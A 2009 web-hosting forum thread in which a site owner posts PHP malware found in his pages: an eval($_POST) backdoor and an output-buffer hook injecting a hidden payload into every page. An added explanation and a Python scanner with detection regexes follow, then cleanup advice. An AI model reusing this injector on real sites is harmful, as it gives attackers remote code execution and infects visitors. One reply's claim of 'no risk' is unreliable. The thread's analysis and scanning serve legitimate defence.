
Hack threat advice

Posted: Wed May 13, 2009 10:38 am
by kendall
This seems to be what is showing up in my logs... I'm trying to get a handle on what its intentions were.

Code:

if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('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'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#['"][^\s'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
This seems to be what the hacker is putting in my index.php and HTML files, along with an "<iframe" link....

OK, I'm not running any CMS software, and I have changed my FTP and made adjustments to my php.ini file... yet other sites of mine are being attacked and hacked as I speak... Is there anything that I should be looking for in my code to help pinpoint a hole and stop it?
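Reading the snippet in the post above from a defender's side: it installs a PHP output-buffer callback (`ob_start('tmp_lkojfghx')`, hooked in through `set_error_handler`) that inserts the base64-decoded `TMP_XHGFJOKL` content in front of `<body>` or at the end of every page the server renders, strips other long obfuscated `<script>` blocks from the output, and the line `eval($_POST['tmp_lkojfghx3'])` lets anyone who knows that parameter name run arbitrary PHP on the host. The injection therefore lives in the files, not in a single request, so the practical first step is to find every copy across the web roots. The scanner below is an added example written for this thread, not code from any poster; the indicator names, the file layout and the two sample files are constructed for the demonstration, and the infected fixture only imitates the shape of the posted code with its payload elided.

```python
"""Scan a web root for the output-buffer injector posted in this thread.

Added example, not from the original post. Indicators are taken from the
injected code shown there (function and constant names, the eval backdoor,
the ob_start/set_error_handler hooks); the sample files are constructed.
"""
from __future__ import annotations

import re
import tempfile
from pathlib import Path

# (label, pattern) pairs. Labels say what the match means so a hit can be
# explained to whoever has to clean the site.
INDICATORS = [
    ("post-eval backdoor", re.compile(r"eval\(\s*\$_POST\[", re.I)),
    ("injector function name", re.compile(r"tmp_lkojfghx", re.I)),
    ("base64 payload constant",
     re.compile(r"define\(\s*'TMP_XHGFJOKL'\s*,\s*base64_decode\(", re.I)),
    ("output-buffer hook", re.compile(r"ob_start\(\s*'tmp_lkojfghx'\s*\)", re.I)),
    ("error-handler hook",
     re.compile(r"set_error_handler\(\s*'tmp_lkojfghx2'\s*\)", re.I)),
    # Generic: a long base64 literal fed to base64_decode, as in the real copy.
    ("long base64_decode literal",
     re.compile(r"base64_decode\(\s*['\"][A-Za-z0-9+/=]{100,}", re.I)),
    # The poster also saw an iframe added; report any iframe so its src is reviewed.
    ("iframe tag (review its src)", re.compile(r"<iframe\b", re.I)),
]

SCANNED_SUFFIXES = (".php", ".html", ".htm")


def scan_text(text: str) -> list[str]:
    """Return the labels of every indicator found in one file's contents."""
    return [label for label, rx in INDICATORS if rx.search(text)]


def scan_tree(root: Path) -> dict[str, list[str]]:
    """Walk a web root and map each suspicious file (relative path) to its hits."""
    hits: dict[str, list[str]] = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in SCANNED_SUFFIXES:
            found = scan_text(path.read_text(errors="replace"))
            if found:
                hits[str(path.relative_to(root))] = found
    return hits


# Constructed sample: an ordinary page.
CLEAN = (
    "<?php\n$title = 'Home';\n"
    "echo '<html><body>' . htmlspecialchars($title) . '</body></html>';\n"
)

# Constructed sample: the same page with a non-functional imitation of the
# posted injection prepended (same names and hooks, payload elided).
INFECTED = (
    "<?php if(!function_exists('tmp_lkojfghx')){"
    "if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);"
    "if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PAYLOAD_ELIDED'));"
    "function tmp_lkojfghx($s){return $s;}"
    "function tmp_lkojfghx2(){ob_start('tmp_lkojfghx');}}"
    "set_error_handler('tmp_lkojfghx2');tmp_lkojfghx2(); ?>\n"
) + CLEAN


def demo() -> dict[str, list[str]]:
    """Build a small constructed web root in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.php").write_text(INFECTED)
        (root / "about.html").write_text("<html><body>About us</body></html>\n")
        (root / "style.css").write_text("body{margin:0}\n")  # not a scanned type
        return scan_tree(root)


if __name__ == "__main__":
    for rel, labels in demo().items():
        print(f"{rel}: {', '.join(labels)}")
```

Run it against a real document root with `scan_tree(Path("/var/www"))` (path assumed); every reported file should be restored from a known-clean copy rather than edited in place, and a match on "post-eval backdoor" means the host has been exposed to remote code execution regardless of what the visible iframe does, which is why the credential changes discussed below matter as much as removing the files.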

Re: Hack threat advice

Posted: Wed May 13, 2009 2:55 pm
by crazycoders
Well, he is definitely trying to inject some HTML/SCRIPT code into your page to do what... I'm not sure... If it's only one use, there is no risk, he'll be hacking himself at worst. Maybe he's trying to find vulnerabilities in your code...

Re: Hack threat advice

Posted: Wed May 13, 2009 3:17 pm
by kaisellgren
You said you are not using CMSs, okay. Are you using any PHP scripts? Are all your websites on the same server? This guy probably got into your server through a vulnerability in an application and now has access to your server.

First you would need to update all scripts you have there to the latest versions. If there are no updates for some scripts, do a Google search for vulnerabilities that may exist in the version you have. Eliminate all unnecessary scripts and junk, and after that reset everything back to normal and especially change all salts, passwords, etc. before putting your sites back in public.

And yes, this means you have to change all FTP credentials, hosting control panel credentials, etc.